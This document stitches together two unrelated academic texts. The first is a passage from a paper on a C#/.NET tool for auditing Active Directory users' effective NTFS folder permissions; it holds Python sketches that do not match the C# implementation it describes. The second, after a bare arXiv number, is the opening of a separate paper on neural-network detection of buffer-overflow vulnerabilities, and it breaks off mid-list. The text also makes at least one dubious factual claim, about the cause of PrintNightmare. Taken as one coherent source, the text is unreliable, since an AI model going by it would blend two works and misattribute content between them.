In fact, the effective access tab of the advanced security settings dialog box, shown in Figure 1, opened by clicking the "Advanced" button in the security tab of the properties window, is designed to scrutinize a user's (or group's) access permissions on a single SO. However, this tool only allows processing a single object at a time. The entire process has to be done iteratively, going through all these dialog boxes for each SO. Conversely, there is no simple and easy way to inspect what kind of access permissions certain users possess on multiple folders, due to the non-existence of such means. To the best of our knowledge, there is no tool that makes up for the deficiency of such a mechanism. Rather, a few command-line tools exist for manipulating access permissions. The first tool that comes to mind is Windows' command-line tool icacls, the successor to the Windows NT tool cacls. It runs in the command prompt and is used for displaying or modifying the access permissions of files or folders. However, working with it is not easy, since it has no GUI and requires learning many of its parameters. In addition, it is not possible to simply get the results in an easily reviewable format, or to run inspections for multiple users and folders. Although it cannot meet the objectives outlined in this article, we demonstrate its output format and deficiencies in the experiments detailed in Section 5.

Figure 1. Advanced security settings window to examine the effective access permissions assigned to a user or group on a resource.

Sung and Yoon developed a command-line tool for the Windows XP environment to secure a single file at a time by assigning the desired permissions to it (Sung and Yoon, 2005). It does not allow inspecting or checking permissions on files or folders, and it lacks a GUI. In addition, it works only on a desktop operating system and thus can only set permissions for local users; Active Directory (AD) users cannot be handled. Another command-line tool is ACACLS (Cone, 2003). Besides mimicking the operation of the Windows NT tool cacls, ACACLS has several additional features that extend cacls' functionality. It aimed to edit the existing security lists of files and folders and to manipulate the inheritance flags of files and directories directly. The limitations of Windows' API hindered fully achieving the second goal.
Nevertheless, ACACLS is not designed for inspecting or reporting effective permissions. Rather, it allows setting permissions through its scripting interface. In addition, it was developed to run only for users on a local computer, and therefore it cannot run in a domain environment. In short, no tool has been devised to check effective access permissions (EAPs) on Windows' SOs. This gap is filled by new software that implements the approach introduced in this article. It provides administrators an easy and simple way of checking the EAPs of users on multiple folders through its GUI.

3. Windows File and Folder Security

The following subsections provide detailed information on the concepts and components of Windows security, including the file system and the access permission mechanisms.

3.1. Access Permission Mechanism

Windows uses two types of security for access control: role-based and Access Control List (ACL)-based. Role-based security is a form of user-level security where a server focuses on the logical role of a user rather than on his or her identity. This is simply and commonly implemented with groups, either local or AD. As opposed to role-based security, ACL-based security focuses more on objects than on users. Each SO has its own access control policy, represented by a list of permission entries stored in an ACL. This brings more complexity than a role-based system, as typically millions of objects, each with its own ACL, exist in an operating system. The management of this complexity is simplified by inheritance (Brown, 2004).

Access permissions can be assigned in one of two ways: explicitly or by inheritance. Explicit permissions are assigned by default when the object is first created, or by user action, whereas inherited permissions are given to an object because it is a child of a parent object. Objects inherit all access permissions designated to their containers. If no access is specifically granted or denied, users or groups are denied access (Microsoft, 2009). The precedence hierarchy for permissions can be summarized as follows, with higher-precedence permissions given at the top of the list (Mueller, 2008):

• Explicit Deny
• Explicit Allow
• Inherited Deny
• Inherited Allow

Restrictive permissions override lenient ones. ACLs allow setting the permissions on files or folders for specific groups or users; they enumerate who (users or groups) has what kind of access (or denial) to certain objects. There are two chief ACL types: the Discretionary Access Control List (DACL) and the System Access Control List (SACL). The SACL handles Windows' auditing features, whereas the DACL contains a list of access rights granted or denied to certain users or groups on SOs (Microsoft, 2021c). ACLs convey Access Control Entries (ACEs) that delineate the security rights of a user or group. Every typical ACE possesses a header, an access mask, and a security identifier (SID). A SID is a unique value of variable length that is used to identify an individual or a group (Microsoft, 2021d). The header defines the type, size, and flags. The access mask specifies the rights that users or groups have to the object. Inheritance flags in an ACE control how the ACE is propagated to child objects.

Each SO has a security descriptor (SD) that contains all security information related to access control for that object. This structure is used to set and query an object's security status. Whenever an object is accessed, its SD is compared to the permissions of the accessing user or group to verify that the requested access is allowed. An SD typically includes the following items (Microsoft, 2021b):

• SID of the owner
• SID of the primary group
• A DACL
• A SACL
• Qualifiers for the preceding items

The decision to grant or deny access to an SO is made based on the access rights stored in the ACEs of its DACL. When a user's SID matches a specific ACE, the ACE is checked to determine whether the access type is Allow or Deny (Microsoft, 2021a). In this process, ACEs are examined in order. As soon as the security system confirms that all requested access rights are granted, or that any of them is denied, it yields success in the former case and failure in the latter.
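The ordered, first-match evaluation described above can be made concrete with a short sketch. The data structures below are hypothetical simplifications standing in for the Win32 structures; the real DACL is evaluated by the kernel, not by user code.

# Simplified sketch of ordered DACL evaluation, assuming hypothetical
# (sid, ace_type, mask) tuples in place of the real Win32 ACE structures.
def check_access(dacl, user_sids, requested):
    """dacl: list of (sid, ace_type, mask) in stored order.
    user_sids: SIDs of the user and of all groups the user belongs to.
    requested: bitmask of requested rights."""
    remaining = requested
    for sid, ace_type, mask in dacl:       # ACEs are examined in order
        if sid not in user_sids:
            continue
        if ace_type == "DENY" and (mask & remaining):
            return False                   # any denied right -> failure
        if ace_type == "ALLOW":
            remaining &= ~mask             # these rights are now granted
        if remaining == 0:
            return True                    # all requested rights granted
    return remaining == 0                  # no matching ACE -> implicit deny

READ, WRITE = 0x1, 0x2
dacl = [("S-1-5-GROUP", "DENY", WRITE), ("S-1-5-USER", "ALLOW", READ | WRITE)]
print(check_access(dacl, {"S-1-5-USER", "S-1-5-GROUP"}, READ))   # True
print(check_access(dacl, {"S-1-5-USER", "S-1-5-GROUP"}, WRITE))  # False

Because deny ACEs are stored before allow ACEs, a first-match walk over the list naturally yields the Explicit Deny > Explicit Allow precedence listed above.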
3.2. NTFS and Permission Types

The primary file system of Windows is NTFS (New Technology File System). There is also the newer Resilient File System (ReFS), available as of Windows Server 2012 and suggested for use in Storage Spaces, designed as a cost-effective platform maximizing data integrity and availability for very large data sets. NTFS offers a full set of features covering security descriptors, disk quotas, encryption, rich metadata, and so on. It can be used with Cluster Shared Volumes (CSV) to ensure constantly available volumes that can be accessed concurrently from numerous nodes of a failover cluster (Microsoft, 2017). Windows Server 2012 supports volumes as large as 256 TB, depending on the cluster size; the number of clusters can be up to 2^32 - 1. NTFS has very robust security features, which can reach even higher levels with BitLocker Drive Encryption.

NTFS permissions are set on an SO through the ACEs in its ACL (NTFS, 2021). They are logically grouped into six basic permissions, each of which contains a definite set of advanced (special) permissions. These groups make it easier to set complementary permissions for users or groups (Stanek, 2008). The entire set of permissions is given in Table 1. Access rights can be changed in the security tab, as shown in Figure 2, in the properties dialog box opened by selecting the properties option from the pop-up menu that appears when right-clicking a file or folder.

Figure 2. Security tab to configure permissions for a file or folder. This screen provides only superficial (not detailed) information about security permissions, and only for a single resource.

Table 1. Special permissions for folders.

Permission                     | Full Control | Modify | Read & Execute | List Folder Contents | Read | Write
Traverse Folder / Execute File | ✓ | ✓ | ✓ | ✓ |   |
List Folder / Read Data        | ✓ | ✓ | ✓ | ✓ | ✓ |
Read Attributes                | ✓ | ✓ | ✓ | ✓ | ✓ |
Read Extended Attributes       | ✓ | ✓ | ✓ | ✓ | ✓ |
Create Files / Write Data      | ✓ | ✓ |   |   |   | ✓
Create Folders / Append Data   | ✓ | ✓ |   |   |   | ✓
Write Attributes               | ✓ | ✓ |   |   |   | ✓
Write Extended Attributes      | ✓ | ✓ |   |   |   | ✓
Delete Subfolders and Files    | ✓ |   |   |   |   |
Delete                         | ✓ | ✓ |   |   |   |
Read Permissions               | ✓ | ✓ | ✓ | ✓ | ✓ | ✓
Change Permissions             | ✓ |   |   |   |   |
Take Ownership                 | ✓ |   |   |   |   |
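To connect these concepts to working code, the following sketch enumerates a folder's DACL entries from Python using the pywin32 bindings (assuming pywin32 is installed). Note that the paper's own tool is written in C#/.NET; this is only an illustration of the same Win32 structures, and the example path is hypothetical.

# Minimal sketch of dumping a folder's DACL with pywin32 (pip install pywin32).
# Illustrates the SD/DACL/ACE structures described above; the paper's actual
# tool uses the .NET FileSystemSecurity API instead.
import win32security
import ntsecuritycon

def dump_dacl(path):
    sd = win32security.GetFileSecurity(
        path, win32security.DACL_SECURITY_INFORMATION)
    dacl = sd.GetSecurityDescriptorDacl()
    for i in range(dacl.GetAceCount()):
        (ace_type, ace_flags), mask, sid = dacl.GetAce(i)
        name, domain, _ = win32security.LookupAccountSid(None, sid)
        kind = "ALLOW" if ace_type == ntsecuritycon.ACCESS_ALLOWED_ACE_TYPE else "DENY"
        inherited = bool(ace_flags & ntsecuritycon.INHERITED_ACE)
        print("%s\\%s: %s mask=0x%08x inherited=%s"
              % (domain, name, kind, mask, inherited))

dump_dacl(r"C:\Library\Projects")  # hypothetical example path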
4. Proposed Work

Windows focuses on SOs rather than on users or groups due to its adoption of ACL-based roles in security permissions. Therefore, access permissions are set individually for each user (except through inheritance) on each SO. That is, only a single SO can be processed at a time unless there is a program or script dedicated to accomplishing this task. Unfortunately, Windows lacks a tool that simplifies or facilitates the inspection of EAPs on multiple SOs. Such a task can be accomplished only by developing a special program carefully designed to scrutinize the DACLs of SOs (folders in our case) and report the results in a GUI. If necessary, the results can also be recorded to files in any desired format. However, the main purpose of this study is to enable administrators to inspect EAPs in an easy, fast, and simple way. This goal is achieved by listing all results in a neat GUI that shows each access type and status (grant or deny) assigned to objects for each user. Further functionality can of course be added to the program as needed or desired.

Our approach is to recursively traverse the folders and check their ACLs for the users and permissions being scrutinized. The user can select a single user or multiple users from AD and specify any combination of permission types. The program allows choosing a single folder or multiple folders located within a root folder. Being able to select multiple folders in a particular location in this way is useful because the folders accessed by network users are usually gathered under a root folder. Certain users are then assigned certain access permissions on specific folders based on their role in the organization. The pseudocode of the algorithm is given below:

Algorithm to scrutinize effective access permissions

Inputs:
  Users: list of active directory users selected from the program
  Folders: paths of folders in the root folder selected from the program
  Permissions: list of access permissions to be inspected for each user on each folder
Output:
  Table: a data table in tabular format where each row stores True or False for each permission for a user on a folder

For each user in Users
  For each folder in Folders
    Insert a row into Table with the related columns  // (user, folder, and permissions)
    For each permission in Permissions
      For each ACE in folder's ACL
        If ACE belongs to user OR to a group of which user is a member
          If ACE contains the permission AND its type is "Allow"
            Set True in the permission column
          Else
            Set False in the permission column
        Else
          Set False in the permission column
Return Table

The entire process is straightforward, but there are some difficulties in implementing this approach because some features are lacking in the Windows API. Namely, an ACE in the ACL of a folder may belong either to a user or to a group. If the SID of the ACE is identical to the SID of the user whose permissions are being inspected, we know that the ACE data belongs to that user, and we simply check the ACE for the permissions we are inspecting. Otherwise, we need to find out via its SID whether the ACE belongs to a group, and if so, make sure the user is a member of that group before continuing further permission inspections. Nevertheless, the Windows API does not provide a simple mechanism to determine whether a SID belongs to a group, or whether the user is in the role of a group. This issue was overcome by developing a sub-module that detects membership status by recursively checking the members of AD groups, as sketched below.
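The sketch below shows the structure of that recursive membership check. The group_members dictionary is a hypothetical in-memory stand-in for the AD queries the sub-module performs; the real tool fetches group members through System.DirectoryServices.

# Sketch of the recursive membership check the sub-module performs. The
# `group_members` dict is a hypothetical stand-in for AD queries.
def is_member(user_sid, group_sid, group_members, seen=None):
    """True if user_sid is a direct or nested member of group_sid."""
    seen = seen or set()
    if group_sid in seen:                  # guard against circular nesting
        return False
    seen.add(group_sid)
    for member in group_members.get(group_sid, ()):
        if member == user_sid:
            return True
        if member in group_members and is_member(user_sid, member,
                                                 group_members, seen):
            return True                    # found via a nested group
    return False

group_members = {
    "SID-Staff":   ["SID-Finance", "SID-UserC"],   # groups can nest groups
    "SID-Finance": ["SID-UserA", "SID-UserB"],
}
print(is_member("SID-UserA", "SID-Staff", group_members))  # True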
4.1. Implementation

Thanks to Microsoft's .NET framework, many things become much easier than programming against the native Windows API written in low-level C++. Though it is still occasionally necessary to call native libraries for specific tasks, .NET elegantly wraps the most important portions of the native APIs' functionality. As of version 2.0, the .NET framework introduced a new namespace that brings access control programming to the managed API world. Compared to native programming in C++, the task is simplified very neatly by the new methods and classes in the .NET framework.

The program is developed with Microsoft Visual Studio 2015 using the C# language. It is built to run on .NET framework version 4.5. However, it can also run on future versions of the .NET framework, provided it is recompiled for the targeted version; this may require a little tweaking to adapt it to new versions. The program was tested on Windows Server 2012 with AD, within a small-scale network established using virtualization technology.

The .NET framework provides a wealth of namespaces dedicated to particular tasks or technologies, from desktop to web applications. Each namespace contains a number of classes, methods, and other programming elements for a specific scope. This study required working with AD services, security principals, and folder security entries. The main namespaces used in the program are given in Table 2 (Halsey and Bettany, 2015).

Table 2. Details of the main namespaces used in the program, which provide the basic programming components for the tasks related to AD users and access permissions.

System.Security.AccessControl: Contains a number of programming elements to manage access control and security-related auditing actions on SOs. The FileSystemSecurity class from this namespace is mainly used to fetch folders' security entries.

System.DirectoryServices.AccountManagement: Provides uniform access and management of user, computer, and group security principals through multiple principal stores such as AD Domain Services, AD Lightweight Directory Services, and the machine security account manager.

System.DirectoryServices: Offers easy access to AD Domain Services from managed code. The namespace covers two different classes: DirectorySearcher and DirectoryEntry. A DirectoryEntry object is constructed to access our domain and passed to the DirectorySearcher class to obtain AD users.

System.Security.Principal: Defines the principal object representing the security context under which code is running. Each user is fetched from AD as a Principal object; then their SIDs are searched for in the folder's ACEs.

System.IO: Allows reading from and writing to files and data streams, and provides elementary file and directory support. This namespace is used for typical file and folder operations and to get the ACEs of folders with the GetAccessControl method of the Directory class.

The other base namespaces and classes used as core components of the application, such as the System.Windows.Forms namespace used to create the main window of the program, are not detailed since they are well known. Only the technologies required for the implementation of this particular task are described.
The main window of the program is presented in Figure 4. The program has two list boxes, one of which lists AD users and the other the access types to inspect. Each item in the lists is shown with a checkbox that can be selected individually, and any combination of the items in these lists can be selected. By ticking the "Select All" checkbox, all items in a list can be selected or, vice versa, de-selected. The current folder path is shown next to the "Path" label. Users can change the current location via the Folder Browser dialog opened by clicking the "Change" button. The "Inspect" button starts the inspection process with the given settings.

The results are given in a tabular format in which each row shows a user's rights on a folder for the given access permission types. Each access-type column displays Yes or No to indicate that the user is allowed or denied the relevant access, respectively. The results can be sorted by any column in ascending or descending order by simply clicking the header of the relevant column. In this way, an administrator can easily examine whether the permissions are set properly. He or she can then be sure that everything is in order, or take the necessary actions to remedy access permission issues in case of any overlooked or inappropriate security assignment. The entire result set can be stored in an Excel file by clicking the "Save" button. With this feature, administrators can store access information for later use, further analyze the data using Excel's advanced filtering features, or keep it as a snapshot of the settings at a certain time.

We have confirmed through our experiments that our tool correctly identifies the access permissions. For this purpose, we compared the results obtained with the Windows GUI tool (the effective access tab) with the results obtained from our tool. We observed that both tools produced exactly the same results.

5. Experiment

We set up an experiment to demonstrate the impact of our approach. For the experiment we created 10 individual folders under the path C:\Library, assigning each of them a few different permission settings. We created 6 users in our AD environment: User-A, User-B, User-C, User-D, User-E, and User-F. We compared our approach with the icacls command-line tool and the Windows GUI tool located in the Effective Access tab of the Advanced Security Settings dialog. We measured the completion time only for the Effective Access dialog and our program, since it is not possible to accomplish a similar task with icacls in a reasonable time. We benchmark these three tools in various respects in the last part of this section. The following subsections present the experiments conducted with each tool.

5.1. Experiment with icacls

In this section, we show how, and to what extent, an administrator can use the icacls.exe tool to check access permissions. As discussed earlier, it is a command-line tool that lists results as structured text with indentation and uses a special abbreviation for each permission type. Below is a snippet of the results of issuing "icacls c:\library\* /t" from the root of the C: drive for the library folder. The /t parameter performs the query for subdirectories as well.
…
c:\library\Accounts
    Coruh\Sample Group:(I)(OI)(CI)(DENY)(R)
    Coruh\userc:(I)(OI)(CI)(DENY)(R)
    Everyone:(I)(OI)(CI)(RX)
    Coruh\guess:(I)(OI)(CI)(F)
    Coruh\Sample Group:(I)(OI)(CI)(W)
    Coruh\usera:(I)(OI)(CI)(F)
c:\library\Archive
    Coruh\Sample Group:(I)(OI)(CI)(DENY)(R)
    Coruh\userc:(I)(OI)(CI)(DENY)(R)
    Everyone:(I)(OI)(CI)(RX)
    Coruh\guess:(I)(OI)(CI)(F)
    Coruh\Sample Group:(I)(OI)(CI)(W)
    Coruh\userb:(I)(OI)(CI)(F)
…

The icacls tool displays or modifies the access permissions in the DACLs assigned directly to users or groups on a resource (SO). Each individual permission entry is given with its abbreviation in parentheses; e.g., (I) and (F) denote "inherited" and "full access", respectively. In brief, these abbreviations denote the permission types given in Table 1, together with information about their inheritance status indicated by the letter I. Since this is more technical, domain-specific, and out of the scope of this paper, we keep this information short and concise; interested readers should refer to (Microsoft, 2021c) for further detailed explanations. Each permission entry explicitly assigned to a particular folder is given in the indented rows below the line where the folder path is written.

It is good practice to group users in the same department and/or the same role into specific groups, and that is how it is usually done. In this way, the operation and management of IT resources are simplified. Access permissions are assigned to groups rather than to users unless otherwise required. In particular, when a certain access right must be granted or denied to a certain user, the relevant adjustment is made only for that user. Given that a particular user's access rights are not explicitly assigned for a resource, the only way to resolve the rights of that user is to examine the rights assigned to the groups that the person is a member of. For example, in the last line, it can be seen that some permissions (I, OI, CI, and F) are explicitly given to "User-A". But what about other users (and, even more, groups that are members of other groups)? Their access rights are ambiguous, even though there is some preliminary information known by every administrator (e.g., all users are members of the "Everyone" group), since one cannot be sure of the membership status of a particular user for the groups given in the DACLs.
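For post-processing at scale, the output above can at least be parsed mechanically. The sketch below infers the line format solely from the snippet shown; icacls has more output variants than are handled here, and the sample lines are taken from the experiment above.

# Sketch of parsing the icacls output shown above into per-folder entries,
# e.g. to post-process "icacls c:\library\* /t" output saved to a file.
# The line format is inferred only from the snippet; icacls has more
# output variants than are handled here.
import re

ENTRY = re.compile(r"^\s+(?P<principal>[^:]+):(?P<flags>(\(\w+\))+)$")

def parse_icacls(lines):
    acls, folder = {}, None
    for line in lines:
        if not line.strip():
            continue
        m = ENTRY.match(line)
        if m:
            flags = re.findall(r"\((\w+)\)", m.group("flags"))
            acls.setdefault(folder, []).append((m.group("principal"), flags))
        else:
            folder = line.strip()          # a non-indented line is a path
    return acls

sample = [
    r"c:\library\Accounts",
    r"    Coruh\userc:(I)(OI)(CI)(DENY)(R)",
    r"    Coruh\usera:(I)(OI)(CI)(F)",
]
print(parse_icacls(sample))

Even with such parsing, however, the fundamental limitation remains: the output lists explicit ACEs per resource, not effective per-user rights.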
When an administrator tries to examine the permissions (grants or denials) of a particular user in more detail, say User-B, he or she has to check the membership status of User-B recursively for each group given in the DACL entries, in order to resolve the inherited grants or denials as described in Section 3.1. In summary, resolving such detailed per-user information with icacls is extremely hard, and performing such a task for multiple users and resources is practically impossible. In fairness, we must state that icacls is a very useful tool for administrators to set permissions with scripts, but not for the tasks this paper aims at.

5.2. Experiment with GUI Tool

Another way to check users' access rights on particular resources is the Windows GUI provided in the Effective Access tab of the Advanced Security Settings dialog, as described in detail in Sections 2 and 3.2. This dialog graphically displays a detailed list of the grants and denials of a particular user on the resource that was right-clicked to open the dialog. The screen output of this tool for the inspection performed for User-B on the Projects folder is given in Figure 3.

Figure 3. Detailed output of the GUI (effective access tab) when inspection is performed for User-B on the Projects folder.

To be fair, this dialog box presents the user's access rights in a very neat and detailed way, but only for a single user at a time. One can choose only a single AD or local user each time to display the effective rights of that user on the resource. It does not provide any means to perform an examination for multiple users on multiple resources in one go, or to export the displayed information in any format. Therefore, performing multiple inspections turns out to be a very time-consuming, annoying, and error-prone task. Given that hundreds of users and many resources exist in organizations, it is not possible to perform such tasks with this tool, as it would take days.

To give readers an idea of how long it would take, we asked three administrators to perform our experiment as described at the beginning of this section, and we measured the elapsed time. We also asked them to fill in a table of the form produced by our program, given in Table 3. We then averaged their completion times. The average completion time for a single user and 10 folders was 14.47 minutes. If the number of folders remained the same and there were a hundred users, it would take 1447 minutes, in other words, more than 3 business days. However, the number of folders, and even of users, is often many times higher than the numbers assumed in our experiment. The burden this task imposes on the IT department can easily be imagined, given the dynamic work environment of IT due to changes in employee roles, entitlements, and even leave and hiring.

5.3. Experiment with Proposed Tool

We repeated the same experiment with our tool as well, but this time for more users. In this case, each folder located under the path C:\Library was inspected for AD users User-A, User-B, User-C, and User-D for all permission types. The output of our tool is demonstrated in Figure 4.

Figure 4. Main window of the program and its detailed output when inspection is performed for users User-A, User-B, User-C, and User-D on the subfolders of the path C:\Library.

Our tool produces its output in a tabular format, which is not possible to obtain with the previously discussed Windows tools. With the proposed tool, it is very easy to produce such a detailed report with just a few clicks, without manual typing, repeating the procedure for multiple users or resources, and so on.
Besides inspecting the results on the display, it is possible to export all reported data to an Excel file. We present in Table 3 a fragment of the report saved to an Excel file for User-B in this experiment. In total, 19 distinct permission entries gathered by the tool for each user and folder are presented in separate columns. If a user has the access right for a given permission type, it is denoted as 'Yes' in the relevant column, otherwise as 'No'. Since the completion time in the previous experiment was measured for one user and this experiment covers four users, the completion time of our tool is averaged accordingly. The average completion time for 1 user and 10 subfolders is approximately 13 seconds. This is very impressive compared to the completion times of Windows' tools, especially considering that no manual or repetitive operation is needed to complete the task.

Table 3. A fragment of the detailed output of our program written to an Excel file. The 19 permission columns are, in order: List Directory, Write Data, Append Data, Read Extended Attributes, Write Extended Attributes, Traverse, Delete Subdirectories and Files, Read Attributes, Write Attributes, Write, Delete, Read Permissions, Read, Read and Execute, Modify, Change Permissions, Take Ownership, Synchronize, Full Control.

User   | Directory              | Permission values (in the column order above)
User-B | C:\Library\Accounts    | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Archive     | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Finance     | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\HR          | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Management  | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Meetings    | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Projects    | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\R&D         | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Surveys     | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
User-B | C:\Library\Working     | No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No
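The report layout of Table 3 is straightforward to reproduce programmatically. The sketch below assembles such a table and exports it to Excel with pandas; the actual tool is a C#/.NET application, so this merely mirrors its report format, and the result data is hypothetical.

# Sketch of building a Table 3-style report and saving it to Excel with
# pandas (pip install pandas openpyxl). The paper's tool is a C# program;
# this merely mirrors its tabular report layout with hypothetical data.
import pandas as pd

PERMISSIONS = ["List Directory", "Write Data", "Append Data", "Read Attributes"]
# hypothetical inspection results: (user, folder) -> set of allowed permissions
results = {
    ("User-B", r"C:\Library\Accounts"): {"Write Data", "Append Data"},
    ("User-B", r"C:\Library\Archive"):  {"Write Data", "Append Data"},
}

rows = [
    {"User": user, "Directory": folder,
     **{p: ("Yes" if p in allowed else "No") for p in PERMISSIONS}}
    for (user, folder), allowed in results.items()
]
report = pd.DataFrame(rows)
report.to_excel("effective_access_report.xlsx", index=False)
print(report)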
Finally, we present in Table 4 a comparison of the tools in terms of operation type, completion time, usability, elaboration, basis, and reporting capability. Operation indicates whether the entire process is accomplished automatically, without any user intervention, or manually in a repetitive manner. Elaboration indicates whether the tool gives a detailed result or not.

Table 4. Comparison of our approach with Windows' command-line and GUI tools. Completion times are computed for a single user and 10 folders.

Method      | Operation | Completion    | Usability     | Elaboration | Based on | Reporting
Proposed    | Automatic | 13 seconds    | Very easy     | Yes         | User     | Excel
Windows GUI | Manual    | 14.47 minutes | Not easy      | Yes         | Resource | No
icacls      | Manual    | N/A           | Far from easy | No          | Resource | No

As can be seen from the table, the proposed program is superior to Windows' built-in tools in every respect and provides all the features that these tools cannot provide on their own. It enables access permission inspection to be done much more effectively than what Windows can offer, in a short time and with detailed reporting.

6. Discussion and Conclusion

In their busy day-to-day work, administrators of the IT departments of organizations have to orchestrate users' access to various network resources. It is a very important requirement for them to ensure that the effective access permissions granted or denied to users are appropriate and that there are no vulnerabilities in network security. Windows offers a resource-based access mechanism that makes it possible to check, on a per-resource basis (individually, not collectively), which users have access to a resource. However, listing all the resources that a user can or cannot access with certain permission types is something administrators need in order to ensure network security, and Windows does not provide a mechanism to easily and quickly examine the accessible resources on a user basis, together with their access types (grant or denial).

By considering Windows' resource-based access permission mechanism from the opposite perspective, as user-based access, the proposed approach allows administrators to examine whether there are any security vulnerabilities in the access permissions assigned to users on multiple resources. In this approach, access permission information programmatically collected from the resources is transformed into user-based access permission information. With this approach, any overlooked, missing, or overly lenient settings in the assignment of access permissions can easily be found. As far as we know, this is the first time a tool allowing detailed inspection and reporting of access permissions, in a way different from the existing tools provided by Windows, has been developed. The program allows inspecting the access rights of any number of AD users on multiple folders in a fast, simple, and detailed fashion. The inspections can be done for any combination of access permissions. The experimental studies have revealed that the program provides great convenience to administrators in verifying access permissions.

Although this approach has been implemented only for AD users' access permissions on folders, it can be applied to groups and other SOs (e.g., individual files). If necessary, the capabilities of the program can be improved with a few minor adjustments, for example, changing security settings from the GUI or storing the inspection results in files. Such features can easily be incorporated into the program through the corresponding libraries and modules provided in the Microsoft .NET framework.
Conflict of Interest Statement

The authors of the article declare that there is no conflict of interest.

Author Contribution Statements

The authors declare that they have contributed equally to the article.
2306.07981

Feature Engineering-Based Detection of Buffer Overflow Vulnerability in Source Code Using Neural Networks

Mst Shapna Akter1, Hossain Shahriar2, Juan Rodriguez Cardenas3, Sheikh Iqbal Ahamed4, and Alfredo Cuzzocrea5
1Department of Computer Science, Kennesaw State University, USA
2Department of Information Technology, Kennesaw State University, USA
3Department of Information Technology, Kennesaw State University, USA
4Department of Computer Science, Marquette University, USA
5iDEA Lab, University of Calabria, Rende, Italy

Abstract—One of the most significant challenges in the field of software code auditing is the presence of vulnerabilities in software source code. Every year, more and more software flaws are discovered, either internally in proprietary code or publicly disclosed. These flaws are highly likely to be exploited and can lead to system compromise, data leakage, or denial of service. To create a large-scale machine learning system for function-level vulnerability identification, we utilized a sizable dataset of C and C++ open-source code containing millions of functions with potential buffer overflow exploits. We have developed an efficient and scalable vulnerability detection method based on neural network models that learn features extracted from the source codes. The source code is first converted into an intermediate representation to remove unnecessary components and shorten dependencies. We maintain the semantic and syntactic information using state-of-the-art word embedding algorithms such as GloVe and fastText. The embedded vectors are subsequently fed into neural networks such as LSTM, BiLSTM, LSTM-Autoencoder, word2vec, BERT, and GPT-2 to classify the possible vulnerabilities. Furthermore, we have proposed a neural network model that can overcome issues associated with traditional neural networks. We have used evaluation metrics such as F1 score, precision, recall, accuracy, and total execution time to measure the performance. We have conducted a comparative analysis between results derived from features containing a minimal text representation and semantic and syntactic information. We have found that all neural network models provide higher accuracy when we use semantic and syntactic information as features. However, this approach requires more execution time due to the added complexity of the word embedding algorithm. Moreover, our proposed model provides higher accuracy than the LSTM, BiLSTM, LSTM-Autoencoder, word2vec, and BERT models, and the same accuracy as the GPT-2 model with greater efficiency.

Keywords: Cyber Security; Vulnerability Detection; Neural Networks; Feature Extraction

I. INTRODUCTION

Security in the digital realm is becoming increasingly important, but there is a significant threat to cyberspace from invasion. Attackers can breach systems and applications due to security vulnerabilities caused by hidden software defects. Internally, proprietary programming contains thousands of these flaws each year [1]. For example, the ransomware Wannacry swept the globe by using a flaw in the Windows server message block protocol [2]. According to the Microsoft Security Response Center, there was an industry-wide surge in high-severity vulnerabilities of 41.7% in the first half of 2015, which represents the greatest proportion of software vulnerabilities in at least three years, accounting for 41.8% [3]. Furthermore, according to a Frost and Sullivan analysis released in 2018, severe and high severity vulnerabilities increased from 693 in 2016 to 929 in 2017, with Google Project Zero coming in second place in terms of disclosing such flaws. On August 14, 2019, Intel issued a warning about a high-severity vulnerability in the software it uses to identify the specifications of Intel processors in Windows PCs [4]. The paper claims that these defects, including information leaking and denial of service assaults, might substantially affect software systems. Although the company issued an update to remedy the problems, attackers can still use these vulnerabilities to escalate their privileges on a machine that has already been compromised. In June 2021, a vulnerability in the Windows Print Spooler service was discovered that allowed attackers to execute code remotely. The vulnerability, known as PrintNightmare, was caused by a buffer overflow and affected multiple versions of Windows in 2021 [5]. Microsoft released a patch to address the issue, but reports later emerged that the patch was incomplete and still left systems vulnerable.

To reduce losses, early vulnerability detection is a good technique. The proliferation of open-source software and code reuse makes these vulnerabilities susceptible to rapid propagation. Source code analysis tools are already available; however, they often only identify a small subset of potential problems based on pre-established rules. Software vulnerabilities can be found using a technique called vulnerability detection. Conventional vulnerability detection employs static and dynamic techniques [6]. Static approaches evaluate source code or executable code without launching any programs, using methods such as data flow analysis, symbolic execution [7], and theorem proving [8]. Static approaches can be used early in software development and have excellent coverage rates, but they have a significant false positive rate. By executing the program, dynamic approaches like fuzzy testing and dynamic symbolic execution can confirm or ascertain the nature of the software. Dynamic methods depend on the coverage of test cases, which results in a low recall despite their low false positive rate and ease of implementation. The advancement of machine learning technology incorporates new approaches to address the limitations of conventional approaches. One of the key research directions is to develop intelligent source code-based vulnerability detection systems. It can be divided into three categories: using software engineering
metrics, anomaly detection, and weak pattern learning [9]. Initially, software engineering measures, including software complexity [10], developer activity [11], and code commits [12], were investigated to train a machine learning model. This strategy was motivated by the idea that software becomes more susceptible as it becomes more complicated, but accuracy and recall need to be improved. Allamanis et al. [13] have shown that the syntactic and semantic information in the code increases the detection accuracy in anomaly detection. Moreover, one work has shown the detection of the anomaly using fully-fledged codes [14]. It reveals previously unidentified weaknesses, but false positive and false negative rates are high. Another work has shown an approach with clean and vulnerable samples to learn vulnerable patterns [15]. This method performs very well but relies on the quality of the dataset. In our work, we propose a solution for detecting software buffer overflow vulnerability using neural networks such as Simple RNN, LSTM, BiLSTM, word2vec, BERT, GPT-2, and LSTM-Autoencoder. We first transform source code samples into the minimum intermediate representations through a tokenizer provided by the Keras library. Later, we extract semantic features using word embedding algorithms such as GloVe and fastText. After finishing the data preprocessing stage, we feed the input representation to the neural networks for classification. Moreover, we develop a neural network that works best among all the models. All the models have been evaluated using evaluation metrics such as F1 score, precision, recall, accuracy, and total execution time. The following is a summary of our contributions:

1. Extracting semantic and syntactic features using GloVe and fastText.
2. Vulnerability detection in source code using LSTM, BiLSTM, LSTM-Autoencoder, word2vec, BERT, and GPT-2 with a minimal intermediate feature representation of the texts.
